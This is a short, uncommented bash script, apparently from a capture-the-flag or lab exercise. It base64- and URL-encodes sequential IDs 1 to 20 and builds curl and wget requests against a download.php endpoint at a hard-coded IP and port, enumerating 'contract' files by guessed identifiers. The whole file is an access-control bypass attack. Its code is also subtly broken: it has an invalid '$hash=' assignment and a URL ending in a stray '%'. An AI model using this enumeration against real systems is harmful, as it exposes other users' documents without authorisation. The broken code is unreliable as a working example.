#!/bin/bash

function create_utf8_code()
{
        local code="$(echo -n "$1" | xxd -ps)"
                local length="${#code}"

                        local i

                                for (( i = 0; i < length; i += 2 ))
                                        do
                                                        echo -n "%${code:$i:2}" | tr '[:lower:]' '[:upper:]'
                                                                done
                                                                }


function encode_uri_component()
{
        local text="${1}"
                local length="${#text}"

                        local i char

                                for (( i = 0; i < length; ++i ))
                                        do
                                                        char="${text:$i:1}"
                                                                        [[ "$char" =~ [-_.!~*\'()a-zA-Z0-9] ]] && echo -n "$char" || create_utf8_code "$char"
                                                                                done
                                                                                }




for i in {1..20}; do
    for hash in $(echo -n $i | base64 -w 0); do
     $hash=$(encode_uri_component $hash)
     echo $hash
      echo "curl -i -v -X GET http://159.65.52.96:30287/download.php?contract=$hash "
                done
                done


 wget --content-disposition http://159.65.52.96:30287/download.php?contract=MjA%3D%
